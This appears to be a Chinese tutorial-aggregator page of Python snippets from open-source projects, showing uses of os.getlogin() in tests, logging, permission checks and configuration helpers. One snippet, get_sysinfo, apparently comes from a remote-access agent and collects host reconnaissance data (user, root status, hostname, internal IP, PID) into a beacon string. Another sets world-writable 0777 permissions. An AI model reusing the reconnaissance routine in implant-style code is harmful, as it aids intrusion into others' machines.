我们从Python开源项目中,提取了以下48个代码示例,用于说明如何使用os.getlogin()。
def get_firefox_db(db_file): '''Return the full path of firefox sqlite databases, platform independent''' success = False plat_dict = {"Windows 7" : r"C:\Users\%s\AppData\Roaming\Mozilla\Firefox\Profiles" % os.getlogin(), "Windows XP" : r"C:\Documents and Settings\%s\Application Data\Mozilla\Firefox\Profiles" % os.getlogin(), "Linux" : r"/home/%s/.mozilla/firefox/" % os.getlogin(), "Darwin" : r"/Users/%s/Library/Application Support/Firefox/Profiles" % os.getlogin()} if platform.system() == "Windows": string = plat_dict[platform.system() + " " + platform.release()] else: string = plat_dict[platform.system()] for item in os.listdir(string): if os.path.isdir(os.path.join(string, item)) and "default" in item: if os.path.isfile(os.path.join(string, item, db_file)): success = True return os.path.join(string, item, db_file) if not success: sys.exit("Couldn't find the database file in the default location! Try providing a different location using the -b option...")
def getPermDetails(self): """Returns the permission details used to change permissions. """ if platform.system() not in ["Windows"]: import pwd #Grab user ID and group ID of actual user uid=pwd.getpwnam(os.getlogin())[2] gid=pwd.getpwnam(os.getlogin())[3] #Mode for files (everyone can read/write/execute. This is somewhat an overkill, but 0666 seems somehow not to work.) mode=0777 return uid,gid,mode return 0,0,0
def test_volume_abspath(): """ Validate that you can bind mount a volume onto an absolute dir & write to it """ ts = str(time.time()) with tempfile.TemporaryDirectory() as tmpdir: username = os.getlogin() subprocess.check_call([ 'repo2docker', '-v', '{}:/home/{}'.format(tmpdir, username), '--user-id', str(os.geteuid()), '--user-name', username, tmpdir, '--', '/bin/bash', '-c', 'echo -n {} > ts'.format(ts) ]) with open(os.path.join(tmpdir, 'ts')) as f: assert f.read() == ts
def test_volume_relpath(): """ Validate that you can bind mount a volume onto an relative path & write to it """ curdir = os.getcwd() try: ts = str(time.time()) with tempfile.TemporaryDirectory() as tmpdir: os.chdir(tmpdir) subprocess.check_call([ 'repo2docker', '-v', '.:.', '--user-id', str(os.geteuid()), '--user-name', os.getlogin(), tmpdir, '--', '/bin/bash', '-c', 'echo -n {} > ts'.format(ts) ]) with open(os.path.join(tmpdir, 'ts')) as f: assert f.read() == ts finally: os.chdir(curdir)
def __load_username(self): """Loads the username that is executing the tests.""" self.__username = getpass.getuser() # Bellow is a platform specific... please, comment the bellow line if need it _user_login = 'adessowiki' # The try bellow is a bug correction for jupyter notebooks try: _user_login = os.getlogin() except OSError as err: warnings.warn("OSError... {0}".format(err)) # Let's get the user folder to see if its running inside his own folder # We are forcing this anyway... if os.getlogin gives error if _user_login == 'adessowiki': _user_folder = os.getcwd() _matched = re.match(r'.*(\/{0}\/).*'.format(self.__username), _user_folder) if not _matched: raise Exception('You can\'t submit function from another user')
def get_sysinfo(): # listener | username | high_integrity | hostname | internal_ip | os_details | process_id | py_version username = os.getlogin() uid = os.popen('id -u').read().strip() highIntegrity = "True" if (uid == "0") else False osDetails = os.uname() hostname = osDetails[1] x = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) x.connect(("10.0.0.0", 80)) internalIP = x.getsockname()[0] x.close() osDetails = ",".join(osDetails) processID = os.getpid() pyVersion = '.'.join([str(x) for x in sys.version_info]) return "%s|%s|%s|%s|%s|%s|%s|%s" % (server, username, highIntegrity, hostname, internalIP, osDetails, processID, pyVersion) # generate a randomized sessionID
def __init__(self, options={}): cmd.Cmd.__init__(self) self.conductor = Conductor(options["projects"], host=options["conductor_host"], port=options["conductor_port"], cache_dir=options["cache_dir"], print_func=export_print) self.ssh_threads = options["ssh_threads"] self.user = options.get("user") or os.getlogin() self.progressbar = options.get("progressbar") or self.DEFAULT_OPTIONS["progressgbar"] self.ping_count = options.get("ping_count") or self.DEFAULT_OPTIONS["ping_count"] self.finished = False self.one_command_mode = False self.alias_scripts = {} self.default_remote_dir = options.get("default_remote_dir") or "/tmp" if "mode" in options: if not options["mode"] in self.MODES: error("invalid mode '%s'. use 'parallel', 'collapse' or 'serial" % options["mode"]) self.mode = self.DEFAULT_MODE else: self.mode = options["mode"] else: self.mode = self.DEFAULT_MODE
def not_owned(): '''Are there files in /home/$USER that are not owned by $USER?''' user = os.getlogin() #Unlike os.getuid(), this gives the actual (non-root, usually) user. home_var = '~'+user home_dir = os.path.expanduser(home_var) cmd = ['find', home_dir , '!', '-user', user, '-type', 'f'] out = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0] out = out.decode('utf-8').split() if len(out) == 0: print('There are no files in your home directory that are owned by another user.') elif len(out) != 0: print('The following files in your home directory are owned by another user. \x1b[6;36;43m [Advice] \x1b[0m') for file in out: print(file) print('You may want to investigate why you do not own these files.\n') else: print('not_owned.py has failed to run properly. Please contact the author with all relevant information.') return(out)
def get_file_info(self): """Method to get the file information, mainly used for saving files. Returns ------- file_info: dict dictionary with file information. """ file_info = dict() file_info["date_created"] = pd.Timestamp.now() file_info["date_modified"] = pd.Timestamp.now() file_info["pastas_version"] = __version__ try: file_info["owner"] = os.getlogin() except: file_info["owner"] = "Unknown" return file_info
def running_with_sudo(): if verify_running_as_root(): try: logged_in_user = os.getlogin() if logged_in_user_is_root(logged_in_user): return False # when logged in as 'root' user notifications will work. else: return True # 'sudo' is used notification won't work. except FileNotFoundError: print("os.getlogin(), returned FileNotFoundError, \ assuming 'openpyn' is running with 'SUDO'") return True except OSError: print("os.getlogin(), returned error, assuming \ 'openpyn' is running with 'SUDO'") return True return False # regular user without 'sudo'
def printHeader(self, t): s = self.stream time_str = time.ctime(t) s.write("<html><head><title>Pool test</title>\n" "<meta http-equiv='refresh' content='2'>\n" "<link rel='stylesheet' href='%s' type='text/css'/>\n" "</head>\n<body>" "<p><table class='info'>" "<caption class='test'>Environment Summary</caption>" "<tr><td>Start time:</td><td>%s</td></tr>" "<tr><td>User name:</td><td>%s</td></tr>" "<tr><td>uname:</td><td>%s</td></tr>" "<tr><td>python:</td><td>%s</td></tr>" "<tr><td>PyTango:</td><td>%s (%s)</td></tr>" "</table></p>" "<p><table class='test'>" "<caption class='test'>Test Summary</caption>\n" "<tr><th>Test</th><th width=100>Status</th><th width=100>Result</th></tr>\n" % (self.css, time_str, os.getlogin(), str(os.uname()), sys.version, PyTango.Release.version, PyTango.Release.version_description)) s.flush()
def fetch_file(self, in_path, out_path): super(Connection, self).put_file(in_path, out_path) display.vvv(u'FETCH {0} TO {1}'.format(in_path, out_path), host=self.machine) in_path = self._prefix_login_path(in_path) returncode, stdout, stderr = self._run_command('copy-from', args=[in_path, out_path], machine=self.machine) if returncode != 0: raise AnsibleError('failed to transfer file {0} from {1}:\n{2}\n{3}'.format(out_path, in_path, stdout, stderr)) # TODO might not be necessary? # Reset file permissions to current user after transferring from # container try: if self.remote_uid is not None: os.chown(out_path, os.geteuid(), os.getegid() or -1) except OSError: raise AnsibleError('failed to change ownership on file {0} to user {1}'.format(out_path, os.getlogin()))
def ensuresudo(): import getpass lPrompt = '> ' # , logfile = sys.stdout) p = pexpect.spawn('sudo -p "{0}" whoami'.format(lPrompt)) lIndex = p.expect([pexpect.EOF, lPrompt]) # I have sudo powers, therefore I return while lIndex != 0: lPwd = getpass.getpass( 'Please insert password for user {0}: '.format(os.getlogin())) p.sendline(lPwd) lIndex = p.expect([pexpect.EOF, lPrompt]) if lIndex == 0: break return p.exitstatus # ------------------------------------------------------------------------------ # ------------------------------------------------------------------------------
def _GetUsername(self): '''Attempt to find the username in a cross-platform fashion.''' try: return os.getenv('USER') or \ os.getenv('LOGNAME') or \ os.getenv('USERNAME') or \ os.getlogin() or \ 'nobody' except (IOError, OSError), e: return 'nobody'
def get_user(): try: user = os.getlogin() except: user = '' pass return user # Returns Hostname
def getlogin(): try: return os.getlogin() except: return getpass.getuser()
def setUp(self): if not socks: raise nose.SkipTest('socks module unavailable') if not subprocess: raise nose.SkipTest('subprocess module unavailable') # start a short-lived miniserver so we can get a likely port # for the proxy self.httpd, self.proxyport = miniserver.start_server( miniserver.ThisDirHandler) self.httpd.shutdown() self.httpd, self.port = miniserver.start_server( miniserver.ThisDirHandler) self.pidfile = tempfile.mktemp() self.logfile = tempfile.mktemp() fd, self.conffile = tempfile.mkstemp() f = os.fdopen(fd, 'w') our_cfg = tinyproxy_cfg % {'user': os.getlogin(), 'pidfile': self.pidfile, 'port': self.proxyport, 'logfile': self.logfile} f.write(our_cfg) f.close() try: # TODO use subprocess.check_call when 2.4 is dropped ret = subprocess.call(['tinyproxy', '-c', self.conffile]) self.assertEqual(0, ret) except OSError, e: if e.errno == errno.ENOENT: raise nose.SkipTest('tinyproxy not available') raise
def __init__(self, debug=False, prefix=myprefix): self.username = os.getlogin() if len(set("[]*?").intersection(set(prefix))) > 0: raise PseudoCrontabException("prefix must not contain any of the shell wildcard matching characters '*', '[', ']', or '?'") self.prefix = prefix self.debug = debug
def Test(app): print("Hello " + os.getlogin() + " - (Real user even after sudo / su)") print("Options:") print(app.options) print("Arguments:") print(app.arguments) print("System Configuration:") print(app.configuration) if not app.data is None: print("Data:") print(app.data.dump()) # iterate the configuration keys s = "" for key in app.data: s = s + " " + str(app.data[key]) print(s.strip()) print("") # injected logger app.logger.warning("hello from the injected loggger") # Using explicitely the root logger always logs to the console logging.debug("This is an info of the root logger") # Logging from myapp.lib myapp_cli_logger = logging.getLogger('myapp.cli') myapp_cli_logger.info("This is an info from myapp.cli") # Not recorded myapp_cli_logger.warning("This is a warning from myapp.cli") # -> sample.log myapp_cli_logger.error("This is an error from myapp.cli") # -> sample.log myapp_cli_logger.critical("This is a critical from myapp.cli") # -> sample.log print(call(["echo", ["hi", "$x", "a"]], shell = True)) print(call(["./test.sh", "QXS"], shell = True)) print(call(["./test.sh", "QXS"], shell = False)) print(1/0)
def read_default_config(): """Read config from several default paths.""" config = ( read_yaml_config(os.path.join(os.getcwd(), 'blackgate.yml')) or \ read_yaml_config(os.path.join(os.getlogin(), '.blackgate.yml')) or \ read_yaml_config(os.path.join('usr', 'local', 'etc', 'blackgate', 'blackgate.yml')) or \ read_yaml_config(os.path.join('etc', 'blackgate', 'blackgate.yml')) ) return config
def save_db(creds, password=''): creds['password'] = password and hexlify(encrypt(password, creds['password'])) or creds['password'] creds['username'] = password and hexlify(encrypt(password, creds['username'])) or creds['username'] keychain = Keychain() account = getlogin() password = "%s%s%s" % (creds['username'], JOIN_STRING, creds['password']) return keychain.set_generic_password(KEYCHAIN, account, password, SERVICE_NAME)
def load_db(password=''): creds = {} keychain = Keychain() account = getlogin() payload = keychain.get_generic_password(KEYCHAIN, account, SERVICE_NAME) if payload and 'password' in payload: parts = payload['password'].split(JOIN_STRING) if(len(parts) > 1): creds['password'] = password and decrypt(password, unhexlify(parts[1])) or parts[1] creds['username'] = password and decrypt(password, unhexlify(parts[0])) or parts[0] return creds
def v2_playbook_on_play_start(self, play): results = {} results['le_jobid'] = self.le_jobid results['started_by'] = os.getlogin() if play.name: results['play'] = play.name results['hosts'] = play.hosts self.emit_formatted(results)
def test_getlogin(self): user_name = os.getlogin() self.assertNotEqual(len(user_name), 0)
def set_local_options(self): MainApp.OS = platform.system() if MainApp.OS == "Linux": computer_username = os.getlogin() MainApp.localfiles_path = "/home/" + computer_username + "/frompigrow/" else: localpath = os.getcwd() localpath += '/frompigrow/' MainApp.localfiles_path = localpath
def get_current_login(): if os.name == "nt": return os.getlogin() else: return pwd.getpwuid(os.geteuid()).pw_name
def write_to_log(_data, _category=EC_NOTIFICATION, _severity=SEV_INFO, _process_id=None, _user_id=None, _occurred_when=None, _address=None, _node_id=None, _uid=None, _pid=None): """ Writes a message to the log using the current facility :param _data: The error message :param _category: The event category (defaults to CN_NOTIFICATION) :param _severity: The severity of the error (defaults to SEV_INFO) :param _process_id: The current process id (defaults to the current pid) :param _user_id: The Id of the user (defaults to the current username) :param _occurred_when: The time of occurrance (defaults to the current time) :param _address: The peer address :param _node_id: An Id for reference (like a node id) :param _uid: The system uid :param _pid: The system pid """ global callback, severity if _severity < severity: return _data _occurred_when = _occurred_when if _occurred_when is not None else str(datetime.datetime.utcnow()) _pid = _pid if _pid is not None else os.getpid() _uid = _uid if _uid is not None else os.getlogin() if callback is not None: callback(_data, _category, _severity, _process_id, _user_id, _occurred_when, _address, _node_id, _uid, _pid) else: print("Logging callback not set, print message:\n" + make_textual_log_message(_data, _category, _severity, _process_id, _user_id, _occurred_when, _address, _node_id, _uid, _pid)) return _data
def make_textual_log_message(_data, _category=None, _severity=None, _process_id=None, _user_id=None, _occurred_when=None, _address=None,_node_id=None, _uid=None, _pid=None): """ Build a nice textual error message based on available information for dialogs or event logs. :param _data: The message text or data :param _category: The kind of error :param _severity: The severity of the error :param _process_id: The current process id :param _user_id: The Id of the user :param _occurred_when: The time of occurrance :param _address: The peer address :param _node_id: An Id for reference (like a node id) :param _uid: The system uid :param _pid: The system pid :return: An error message """ _result = "Process Id: " + (str(_process_id) if _process_id is not None else "Not available") _result += ", Adress: " + (str(_address) if _address is not None else str("None")) _result += (" - An error occurred:\n" if _severity > 2 else " - Message:\n") + str(_data) _result += "\nEvent category: " + category_to_identifier(_category, "invalid event category:") if _category is not None else "" _result += "\nSeverity: " + severity_to_identifier(_severity, "invalid severity level:") if _severity is not None else "" _result += "\nUser Id: " + str(_user_id) if _user_id is not None else "" _result += "\nOccurred when: " + str(_occurred_when) if _occurred_when is not None else "" _result += "\nEntity Id: " + str(_node_id) if _node_id is not None else "" _result += "\nSystem uid: " + (str(_uid) if _uid is not None else str(os.getlogin())) _result += "\nSystem pid: " + (str(_pid) if _pid is not None else str(os.getpid())) return _result
def from_local_shell(): username = os.getlogin() groups = [] for group in grp.getgrall(): if username in group.gr_mem: groups.append(group.gr_name) return JanusContext(username, groups, 'shell')
def _GetUsername(self): '''Attempt to find the username in a cross-platform fashion.''' try: return os.getenv('USER') or \ os.getenv('LOGNAME') or \ os.getenv('USERNAME') or \ os.getlogin() or \ 'nobody' except (AttributeError, IOError, OSError), e: return 'nobody'
def test_user(): """ Validate user id and name setting """ ts = str(time.time()) # FIXME: Use arbitrary login here, We need it now since we wanna put things to volume. username = os.getlogin() userid = str(os.geteuid()) with tempfile.TemporaryDirectory() as tmpdir: subprocess.check_call([ 'repo2docker', '-v', '{}:/home/{}'.format(tmpdir, username), '--user-id', userid, '--user-name', username, tmpdir, '--', '/bin/bash', '-c', 'id -u > id && pwd > pwd && whoami > name && echo -n $USER > env_user'.format(ts) ]) with open(os.path.join(tmpdir, 'id')) as f: assert f.read().strip() == userid with open(os.path.join(tmpdir, 'pwd')) as f: assert f.read().strip() == '/home/{}'.format(username) with open(os.path.join(tmpdir, 'name')) as f: assert f.read().strip() == username with open(os.path.join(tmpdir, 'name')) as f: assert f.read().strip() == username
def tags_to_csv(csv_filename,tag_pairs,class_num=0,class_label=''): with open(csv_filename, 'w') as csv_fo: csv_writer = csv.writer(csv_fo) for start, end in tag_pairs: if class_label=='': csv_writer.writerow([start,class_num,end]) else: csv_writer.writerow([start,class_num,end,class_label]) if len(tag_pairs)>0: csv_fo.write('\n\n## RandomTags.py run by '+str(os.getlogin())) csv_fo.write('\n## '+strftime("%Y-%m-%d %H:%M:%S", gmtime())+' GMT\n')
def testSQueueNotFound(self, subprocessMock): """ When an attempt to run squeue fails due to an OSError, an SQueueError must be raised. """ subprocessMock.side_effect = OSError('No such file or directory') error = ( "^Encountered OSError \(No such file or directory\) when running " "'squeue -u %s'$" % getlogin()) assertRaisesRegex(self, SQueueError, error, SQueue)
def testAllColumnsMissing(self, subprocessMock): """ When the squeue output does not contain any of the right column headings an SQueueError must be raised. """ subprocessMock.return_value = 'Bad header\n' error = ( '^Required columns \(JOBID, NODELIST\(REASON\), ST, TIME\) not ' "found in 'squeue -u %s' output$" % getlogin()) assertRaisesRegex(self, SQueueError, error, SQueue)
def testSomeColumnsMissing(self, subprocessMock): """ When the squeue output contains only some of the right column headings an SQueueError must be raised, indicating which columns were not found. """ subprocessMock.return_value = 'JOBID ST\n' error = ( '^Required columns \(NODELIST\(REASON\), TIME\) not found in ' "'squeue -u %s' output$" % getlogin()) assertRaisesRegex(self, SQueueError, error, SQueue)
def testRepeatColumnName(self, subprocessMock): """ When the squeue output contains a repeated column heading (among the headings we're interested in) an SQueueError must be raised. """ subprocessMock.return_value = 'JOBID ST JOBID\n' error = ( "^Multiple columns with title 'JOBID' found in 'squeue -u %s' " "output$" % getlogin()) assertRaisesRegex(self, SQueueError, error, SQueue)
def testSQueueCalledAsExpectedWhenNoArgsPassed(self, subprocessMock): """ When no squeue arguments are passed, it must be called as expected (with -u LOGIN_NAME). """ subprocessMock.return_value = 'JOBID ST TIME NODELIST(REASON)\n' SQueue() subprocessMock.assert_called_once_with(['squeue', '-u', getlogin()], universal_newlines=True)
def _GetUsername(self): """Attempt to find the username in a cross-platform fashion.""" try: return os.getenv('USER') or \ os.getenv('LOGNAME') or \ os.getenv('USERNAME') or \ os.getlogin() or \ 'nobody' except (AttributeError, IOError, OSError): return 'nobody'
def checkBuildUser(self): ''' Checks if the build user has UID of 0 @author: Roy Nielsen, Eric Ball @return: Tuple containing the current user's login name and UID ''' # This method is called before ramdisk creation, so it does not use the # try/except block that most methods do print "Starting checkBuildUser..." CURRENT_USER = os.getlogin() RUNNING_ID = str(os.geteuid()) print "UID: " + RUNNING_ID if RUNNING_ID != "0": print " " print "****************************************" print "***** Current logged in user: " + CURRENT_USER print "***** Please run with SUDO " print "****************************************" print " " exit(1) else: print "***** Current logged in user: " + CURRENT_USER print "checkBuildUser Finished..." return CURRENT_USER, RUNNING_ID
def _make_cluster_name(image, cpu_request, mem_limit, unique_name): import hashlib import os if unique_name: return 'l-' + _random_string(20) return "c-" + hashlib.md5("{}-{}-{}-{}-{}".format(image, cpu_request, mem_limit, kubeque.__version__, os.getlogin()).encode("utf8")).hexdigest()[:20]